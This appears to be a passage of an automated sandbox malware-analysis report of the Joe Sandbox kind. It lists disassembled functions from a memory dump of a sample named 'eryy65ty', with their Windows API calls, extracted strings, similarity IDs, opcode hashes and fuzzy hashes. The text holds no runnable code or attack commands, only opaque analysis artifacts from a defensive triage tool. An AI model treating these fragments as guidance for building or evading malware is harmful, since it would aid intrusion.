                                                                                                        • Part of subcall function 00E92444: shared_ptr.LIBCMT ref: 00E92460
                                                                                                        • Part of subcall function 00E9236F: DName::operator+.LIBCMT ref: 00E92390
                                                                                                      • DName::operator+.LIBCMT ref: 00E93835
                                                                                                      • DName::operator+.LIBCMT ref: 00E93895
                                                                                                      • DName::operator+.LIBCMT ref: 00E938A2
                                                                                                      • DName::operator+.LIBCMT ref: 00E938E9
                                                                                                      • DName::operator+.LIBCMT ref: 00E938F6
                                                                                                      Similarity
                                                                                                      • API ID: Name::operator+$shared_ptr
                                                                                                      APIs
                                                                                                      • QueryPerformanceCounter.KERNEL32(?), ref: 00E87B3A
                                                                                                      • GetLastError.KERNEL32(0000000A), ref: 00E87B65
                                                                                                      Strings
                                                                                                      • Timer: QueryPerformanceFrequency failed with error , xrefs: 00E87C6B
                                                                                                      • Timer: QueryPerformanceCounter failed with error , xrefs: 00E87B80
                                                                                                      Similarity
                                                                                                      • API ID: CounterErrorLastPerformanceQuery
                                                                                                      • String ID: Timer: QueryPerformanceCounter failed with error $Timer: QueryPerformanceFrequency failed with error
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID: AllocCriticalErrorEventLastLeaveSection
                                                                                                      • String ID: @a$tss
                                                                                                      APIs
                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00E4B1B6
                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00E4B1D6
                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00E4B1F6
                                                                                                      • std::_Facet_Register.LIBCPMT ref: 00E4B291
                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00E4B2A9
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
                                                                                                      • String ID: [8
                                                                                                      APIs
                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00E4B416
                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00E4B436
                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00E4B456
                                                                                                      • std::_Facet_Register.LIBCPMT ref: 00E4B4F1
                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00E4B509
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
                                                                                                      • String ID: [8
                                                                                                      APIs
                                                                                                        • Part of subcall function 00EAC7EC: _free.LIBCMT ref: 00EAC811
                                                                                                      • _free.LIBCMT ref: 00EACAF0
                                                                                                        • Part of subcall function 00EA4646: RtlFreeHeap.NTDLL(00000000,00000000,?,00EA1489), ref: 00EA465C
                                                                                                        • Part of subcall function 00EA4646: GetLastError.KERNEL32(?,?,00EA1489), ref: 00EA466E
                                                                                                      • _free.LIBCMT ref: 00EACAFB
                                                                                                      • _free.LIBCMT ref: 00EACB06
                                                                                                      • _free.LIBCMT ref: 00EACB5A
                                                                                                      • _free.LIBCMT ref: 00EACB65
                                                                                                      • _free.LIBCMT ref: 00EACB70
                                                                                                      • _free.LIBCMT ref: 00EACB7B
                                                                                                      Similarity
                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                      • String ID:
                                                                                                      • API String ID: 776569668-0
                                                                                                      APIs
                                                                                                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00EA0AAC,?,?,00EA0A74,?,?), ref: 00EA0B1B
                                                                                                      • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00EA0B2E
                                                                                                      • FreeLibrary.KERNEL32(00000000,?,?,?,00EA0AAC,?,?,00EA0A74,?,?), ref: 00EA0B51
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                      • String ID: CorExitProcess$`F$mscoree.dll
                                                                                                      • API String ID: 4061214504-683042447
                                                                                                      APIs
                                                                                                      • EnterCriticalSection.KERNEL32(00EED39C,00E38EA1,?,00E785D8,00EEBDA4,00EBA3F0,00EEBD74,00000002,00E38EA1,00E7866C,00000001), ref: 00E8D618
                                                                                                      • LeaveCriticalSection.KERNEL32(00EED39C,?,00E785D8,00EEBDA4,00EBA3F0,00EEBD74,00000002,00E38EA1,00E7866C,00000001), ref: 00E8D64B
                                                                                                      • WakeAllConditionVariable.KERNEL32(?,00EEBDA4,00EBA3F0,00EEBD74,00000002,00E38EA1,00E7866C,00000001), ref: 00E8D6C2
                                                                                                      • SetEvent.KERNEL32(?,00EEBDA4,00EBA3F0,00EEBD74,00000002,00E38EA1,00E7866C,00000001), ref: 00E8D6CC
                                                                                                      • ResetEvent.KERNEL32(?,00EEBDA4,00EBA3F0,00EEBD74,00000002,00E38EA1,00E7866C,00000001), ref: 00E8D6D8
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID: CriticalEventSection$ConditionEnterLeaveResetVariableWake
                                                                                                      • String ID: `F
                                                                                                      • API String ID: 3916383385-2505862506
                                                                                                      APIs
                                                                                                      • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00E9B2DB,00E9B2DB,?,?,?,00EA88DF,00000001,00000001,6CE85006), ref: 00EA871F
                                                                                                      • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,00000000,?,?,?,00EA88DF,00000001,00000001,6CE85006,?,?,?), ref: 00EA8788
                                                                                                      • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,6CE85006,00000000,00000000,?,?,00000000,?,00000000,00000000,00000000,00000000), ref: 00EA8868
                                                                                                      • __freea.LIBCMT ref: 00EA8875
                                                                                                        • Part of subcall function 00EA6049: RtlAllocateHeap.NTDLL(00000000,?,00000011,?,00E8EE48,00000000,00000011,00000001,?), ref: 00EA607B
                                                                                                      • __freea.LIBCMT ref: 00EA887E
                                                                                                      • __freea.LIBCMT ref: 00EA88A3
                                                                                                      Similarity
                                                                                                      • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                      • String ID:
                                                                                                      • API String ID: 1414292761-0
                                                                                                      APIs
                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 00E8D2C8
                                                                                                      • MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 00E8D333
                                                                                                      • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00E8D350
                                                                                                      • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00E8D38F
                                                                                                      • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00E8D3EE
                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00E8D411
                                                                                                      Similarity
                                                                                                      • API ID: ByteCharMultiStringWide
                                                                                                      • String ID:
                                                                                                      • API String ID: 2829165498-0
                                                                                                      APIs
                                                                                                      • DName::operator+.LIBCMT ref: 00E97D0A
                                                                                                      • DName::operator+.LIBCMT ref: 00E97D16
                                                                                                        • Part of subcall function 00E92444: shared_ptr.LIBCMT ref: 00E92460
                                                                                                      • DName::operator+=.LIBCMT ref: 00E97DD6
                                                                                                        • Part of subcall function 00E9657B: DName::operator+.LIBCMT ref: 00E965E6
                                                                                                        • Part of subcall function 00E9657B: DName::operator+.LIBCMT ref: 00E968A4
                                                                                                        • Part of subcall function 00E9236F: DName::operator+.LIBCMT ref: 00E92390
                                                                                                      • DName::operator+.LIBCMT ref: 00E97D91
                                                                                                        • Part of subcall function 00E9249C: DName::operator=.LIBVCRUNTIME ref: 00E924BD
                                                                                                      • DName::DName.LIBVCRUNTIME ref: 00E97DFA
                                                                                                      • DName::operator+.LIBCMT ref: 00E97E06
                                                                                                      Similarity
                                                                                                      • API ID: Name::operator+$NameName::Name::operator+=Name::operator=shared_ptr
                                                                                                      • String ID:
                                                                                                      • API String ID: 2795783184-0
                                                                                                      APIs
                                                                                                        • Part of subcall function 00E97E1C: Replicator::operator[].LIBVCRUNTIME ref: 00E97E59
                                                                                                      • DName::operator=.LIBVCRUNTIME ref: 00E969D3
                                                                                                        • Part of subcall function 00E9657B: DName::operator+.LIBCMT ref: 00E965E6
                                                                                                        • Part of subcall function 00E9657B: DName::operator+.LIBCMT ref: 00E968A4
                                                                                                      • DName::operator+.LIBCMT ref: 00E9698E
                                                                                                      • DName::operator+.LIBCMT ref: 00E9699A
                                                                                                      • DName::DName.LIBVCRUNTIME ref: 00E969E7
                                                                                                      • DName::operator+.LIBCMT ref: 00E969F6
                                                                                                      • DName::operator+.LIBCMT ref: 00E96A02
                                                                                                      Similarity
                                                                                                      • API ID: Name::operator+$NameName::Name::operator=Replicator::operator[]
                                                                                                      • String ID:
                                                                                                      • API String ID: 955152517-0
                                                                                                      APIs
                                                                                                      • EnterCriticalSection.KERNEL32(0090FD58), ref: 00EB9FC9
                                                                                                      • SetEvent.KERNEL32(?), ref: 00EB9FE6
                                                                                                      • LeaveCriticalSection.KERNEL32(0090FD58), ref: 00EBA007
                                                                                                      • EnterCriticalSection.KERNEL32(0090FD58), ref: 00EBA02D
                                                                                                      • SetEvent.KERNEL32(?), ref: 00EBA04E
                                                                                                      • LeaveCriticalSection.KERNEL32(0090FD58), ref: 00EBA06B
                                                                                                      Similarity
                                                                                                      • API ID: CriticalSection$EnterEventLeave
                                                                                                      • String ID:
                                                                                                      • API String ID: 3094578987-0
                                                                                                      APIs
                                                                                                      • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 00E345DA
                                                                                                      • CloseHandle.KERNEL32(?), ref: 00E345E3
                                                                                                      • TerminateThread.KERNEL32(?,00000000), ref: 00E345F9
                                                                                                      • QueueUserAPC.KERNEL32(00E33670,?,00000000), ref: 00E34606
                                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00E34611
                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00E34625
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      Similarity
                                                                                                      • API ID: CloseHandleWait$MultipleObjectObjectsQueueSingleTerminateThreadUser
                                                                                                      • String ID:
                                                                                                      • API String ID: 3743911766-0
                                                                                                      • Opcode ID: a6ee4df395ccd5bcb8a90f81dc2e83ede24bc55c00bcf94eaf16b847ebeabc29
                                                                                                      • Instruction ID: 85a7e59cf186d3114307a83daae7e4e79fd510b750b15447c816cf14d0e6a120
                                                                                                      • Opcode Fuzzy Hash: a6ee4df395ccd5bcb8a90f81dc2e83ede24bc55c00bcf94eaf16b847ebeabc29
                                                                                                      • Instruction Fuzzy Hash: 9111B431901215EFCB10AF55DC4AB6BBBB4AF49720F154259E92ABB2E0C7B1BC04CB90
                                                                                                      APIs
                                                                                                      • GetLastError.KERNEL32(?,?,00E90E14,00E8F178,00E8E694), ref: 00E90E2B
                                                                                                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00E90E39
                                                                                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00E90E52
                                                                                                      • SetLastError.KERNEL32(00000000,00E90E14,00E8F178,00E8E694), ref: 00E90EA4
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLastValue___vcrt_
                                                                                                      • String ID:
                                                                                                      • API String ID: 3852720340-0
                                                                                                      • Opcode ID: 93039e84ce124d8c2d28d7e8495edca7e4e9c0d249854304ba9d897eec7fc230
                                                                                                      • Instruction ID: 21c47b5b7dc5b58c6db9d30cedb2e8fdd89f225875d716b8e7b80129101f30b0
                                                                                                      • Opcode Fuzzy Hash: 93039e84ce124d8c2d28d7e8495edca7e4e9c0d249854304ba9d897eec7fc230
                                                                                                      • Instruction Fuzzy Hash: 0601B53210A3119DDF3526B5FCC55672BD4DB127B9760272EF424791F1EF515C096140
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      Similarity
                                                                                                      • API ID: operator+shared_ptr
                                                                                                      • String ID: t
                                                                                                      • API String ID: 864562889-4213291413
                                                                                                      • Opcode ID: 0a43394fe19166b99d5df2002e3086fdca0871fd0375679f1500fc73cae6e9ed
                                                                                                      • Instruction ID: f705d60c6610f9c83a097e31a6ab824f3077a3bfee0c55dfdc3b0a448197ca38
                                                                                                      • Opcode Fuzzy Hash: 0a43394fe19166b99d5df2002e3086fdca0871fd0375679f1500fc73cae6e9ed
                                                                                                      • Instruction Fuzzy Hash: 6F616CB180420EEFCF25CF69DA859A97FB9FB44308F14926BE419BB211E7729645CF40
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      Similarity
                                                                                                      • API ID: AdjustPointer
                                                                                                      • String ID: `F
                                                                                                      • API String ID: 1740715915-2505862506
                                                                                                      • Opcode ID: 730f55bf41f9db93863fbe16d863955850229f0f0654c4176d59aa67439e9030
                                                                                                      • Instruction ID: 01821971abfb48bd3432f16df34adc961e48c056c222701d85e25a5b168aa672
                                                                                                      • Opcode Fuzzy Hash: 730f55bf41f9db93863fbe16d863955850229f0f0654c4176d59aa67439e9030
                                                                                                      • Instruction Fuzzy Hash: 51511372600647EFEF289F10D981BAA77E4EF04314F2451ADE85977291EB32ED80DB90
                                                                                                      APIs
                                                                                                      • ___std_exception_copy.LIBVCRUNTIME ref: 00E3237F
                                                                                                        • Part of subcall function 00E8F18A: RaiseException.KERNEL32(E06D7363,00000001,00000003,?,00E49A0A,?,00E8C15E,?,00EE3CB4,?,?,?,?,00E49A0A,AllocatorBase: requested size would cause integer overflow,AB1AAB9C), ref: 00E8F1EA
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      Similarity
                                                                                                      • API ID: ExceptionRaise___std_exception_copy
                                                                                                      • String ID: H#$H#$ios_base::badbit set$ios_base::failbit set
                                                                                                      • API String ID: 3109751735-3082803955
                                                                                                      • Opcode ID: 296aef3cdf898f17b5fd2741472a5875cbfe73d938ce76e875ceb43e6784e913
                                                                                                      • Instruction ID: 53715abca80a7e2fc27d43a09cdc14adbd515ad18ae34f1bf60bace95535de29
                                                                                                      • Opcode Fuzzy Hash: 296aef3cdf898f17b5fd2741472a5875cbfe73d938ce76e875ceb43e6784e913
                                                                                                      • Instruction Fuzzy Hash: 1F41F2B1900209ABC704DF58C845BAEFBF8EF49310F14956EF958B7291E771A944CBA0
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      Similarity
                                                                                                      • API ID: EqualOffsetTypeids
                                                                                                      • String ID: 0n
                                                                                                      • API String ID: 1707706676-3368625520
                                                                                                      • Opcode ID: 7eba31bc2cdc899ce0d39c1d43e6a64f477002fbbb014f00cff841445868ded1
                                                                                                      • Instruction ID: 6a1a8564975f9b6759c84c05f557b9030afdeefd9de6cdd158b08a6f234aa35c
                                                                                                      • Opcode Fuzzy Hash: 7eba31bc2cdc899ce0d39c1d43e6a64f477002fbbb014f00cff841445868ded1
                                                                                                      • Instruction Fuzzy Hash: 2D51AA359042099FCF14EF68C580AEEFBF0EF55318F1454AADC99B7251D332AA05CB94
                                                                                                      APIs
                                                                                                      • DName::operator+.LIBCMT ref: 00E94B60
                                                                                                        • Part of subcall function 00E92422: DName::operator+=.LIBCMT ref: 00E92438
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      Similarity
                                                                                                      • API ID: Name::operator+Name::operator+=
                                                                                                      • String ID: =>
                                                                                                      • API String ID: 382699925-4216647267
                                                                                                      • Opcode ID: 64e284ee06100d65e7fae06df454144630eefc3247db9a62a265b658c949b418
                                                                                                      • Instruction ID: 38ea1b696381a13ef3b7b27e64dff02d413be25e0482322008ed0a2eca15ffc5
                                                                                                      • Opcode Fuzzy Hash: 64e284ee06100d65e7fae06df454144630eefc3247db9a62a265b658c949b418
                                                                                                      • Instruction Fuzzy Hash: A0410CB190120A9FDF04DFA4DA85EEEBBF4FB44314F102519E505B7280D7759A4ACB90
                                                                                                      APIs
                                                                                                      • UnDecorator::getSignedDimension.LIBCMT ref: 00E97447
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Decorator::getDimensionSigned
                                                                                                      • String ID: !n$`F
                                                                                                      • API String ID: 2996861206-2265164862
                                                                                                      • Opcode ID: 6291f77dc8cd01ab95ba428f714927bc198d2c2ae3214879f280fa62a415d04f
                                                                                                      • Instruction ID: 82934da2980b8d298c0f8c1726e10c4a56f6f3cf29e183a9b473b93478b6ac74
                                                                                                      • Opcode Fuzzy Hash: 6291f77dc8cd01ab95ba428f714927bc198d2c2ae3214879f280fa62a415d04f
                                                                                                      • Instruction Fuzzy Hash: 84316F7190820D9FDF14DBA4ED56BEEB7F8AB48314F10101AE551B7181DB746A09CB64
                                                                                                      APIs
                                                                                                        • Part of subcall function 00E33020: __alldvrm.LIBCMT ref: 00E33073
                                                                                                        • Part of subcall function 00E33020: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E33094
                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E40F0D
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      Similarity
                                                                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$__alldvrm
                                                                                                      • String ID: seconds.$(_$Calculated sum of squares for 5 seconds: $Time taken:
                                                                                                      • API String ID: 67483490-2398832356
                                                                                                      • Opcode ID: 61b7972f994a65c8c1d104e2d2da01aaf684671fd7b6d4f184f9909ed4c244b6
                                                                                                      • Instruction ID: 69f5e0443f823e63908ceee06e8dee0882ad4ed41b0fbbb1c73bbf09b6252ab2
                                                                                                      • Opcode Fuzzy Hash: 61b7972f994a65c8c1d104e2d2da01aaf684671fd7b6d4f184f9909ed4c244b6
                                                                                                      • Instruction Fuzzy Hash: 4621C3762043018FC614EE78E89692FB7E5EFC4310F146D29F551B7252DA34E909CA93
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: NameName::
                                                                                                      • String ID: %lf$A
                                                                                                      • API String ID: 1333004437-43661536
                                                                                                      • Opcode ID: 7440243440425997bc211d55d0681aa0d22e9d7e8fa2c06b0c99b4f0be07e51f
                                                                                                      • Instruction ID: 1be41b8d951fbaff1a093d5d03ff437222757b351a62789e3662793c5db49ab8
                                                                                                      • Opcode Fuzzy Hash: 7440243440425997bc211d55d0681aa0d22e9d7e8fa2c06b0c99b4f0be07e51f
                                                                                                      • Instruction Fuzzy Hash: 1931ACB1A04A4CDFCF15DFA4D845AEEBBB4FB09300F00505EE446BB281DBB0984ACB81
                                                                                                      APIs
                                                                                                      • FreeLibrary.KERNEL32(00000000,?,?,?,00E98463,?,?,00EED794,00000000,?,00E9858E,00000004,InitializeCriticalSectionEx,00EC9170,00EC9178,00000000), ref: 00E98432
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FreeLibrary
                                                                                                      • String ID: api-ms-
                                                                                                      • API String ID: 3664257935-2084034818
                                                                                                      • Opcode ID: ce22bf6ded01ee24f81050317c5a879ba290eb2d9a9f06565a3ceb36c25ed229
                                                                                                      • Instruction ID: 41262667c4e83b9c7663628ec89a89b786e0d1fd5a624b409ada1d2ccd57ab8a
                                                                                                      • Opcode Fuzzy Hash: ce22bf6ded01ee24f81050317c5a879ba290eb2d9a9f06565a3ceb36c25ed229
                                                                                                      • Instruction Fuzzy Hash: 4B110631A01226AFCF228B699D44B9E7394AF13774F251221FD20FB2E0DB70ED0086D1
                                                                                                      APIs
                                                                                                      • SleepConditionVariableCS.KERNEL32(?,00E8D67D,00000064,?,00E785A8,00EEBDA4,AB1AAB9C,00E38EA1,00E7866C,00000001), ref: 00E8D703
                                                                                                      • LeaveCriticalSection.KERNEL32(00EED39C,AB1AAB9C,?,00E8D67D,00000064,?,00E785A8,00EEBDA4,AB1AAB9C,00E38EA1,00E7866C,00000001), ref: 00E8D70D
                                                                                                      • WaitForSingleObjectEx.KERNEL32(AB1AAB9C,00000000,?,00E8D67D,00000064,?,00E785A8,00EEBDA4,AB1AAB9C,00E38EA1,00E7866C,00000001), ref: 00E8D71E
                                                                                                      • EnterCriticalSection.KERNEL32(00EED39C,?,00E8D67D,00000064,?,00E785A8,00EEBDA4,AB1AAB9C,00E38EA1,00E7866C,00000001), ref: 00E8D725
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
                                                                                                      • String ID: `F
                                                                                                      • API String ID: 3269011525-2505862506
                                                                                                      • Opcode ID: 5bc415cea3e5e51dfe0d28a4b1300acc3a635f5a8e4ae118d00926ec779b6e91
                                                                                                      • Instruction ID: d738a03142a73873a0a943c91f0ab1a89354ddc244bc6d5c1fee917537d4c2cf
                                                                                                      • Opcode Fuzzy Hash: 5bc415cea3e5e51dfe0d28a4b1300acc3a635f5a8e4ae118d00926ec779b6e91
                                                                                                      • Instruction Fuzzy Hash: E5E01A3664976CEFCA123B53EC09A9F7F29EB05B51F011121FA0E7A1A4C7A21D058BD6
                                                                                                      APIs
                                                                                                        • Part of subcall function 00EA6049: RtlAllocateHeap.NTDLL(00000000,?,00000011,?,00E8EE48,00000000,00000011,00000001,?), ref: 00EA607B
                                                                                                      • _free.LIBCMT ref: 00EA23C7
                                                                                                      • _free.LIBCMT ref: 00EA23DE
                                                                                                      • _free.LIBCMT ref: 00EA23FD
                                                                                                      • _free.LIBCMT ref: 00EA2418
                                                                                                      • _free.LIBCMT ref: 00EA242F
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _free$AllocateHeap
                                                                                                      • String ID:
                                                                                                      • API String ID: 3033488037-0
                                                                                                      • Opcode ID: 9bf4e4224d05a1970d8bee42206766a260d41200a5c8d9059a389652696decf9
                                                                                                      • Instruction ID: 928759d4499ace2dc3371ec4cf69eecac1749d29fed4eac492dd715f6de882a9
                                                                                                      • Opcode Fuzzy Hash: 9bf4e4224d05a1970d8bee42206766a260d41200a5c8d9059a389652696decf9
                                                                                                      • Instruction Fuzzy Hash: A751C171A00309AFDB20DF29CD42A6A77F4EF5E324B14156DEA09FB250E735E905CB80
                                                                                                      APIs
                                                                                                      • GetEnvironmentStringsW.KERNEL32 ref: 00EAB678
                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00EAB69B
                                                                                                        • Part of subcall function 00EA6049: RtlAllocateHeap.NTDLL(00000000,?,00000011,?,00E8EE48,00000000,00000011,00000001,?), ref: 00EA607B
                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00EAB6C1
                                                                                                      • _free.LIBCMT ref: 00EAB6D4
                                                                                                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00EAB6E3
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmp
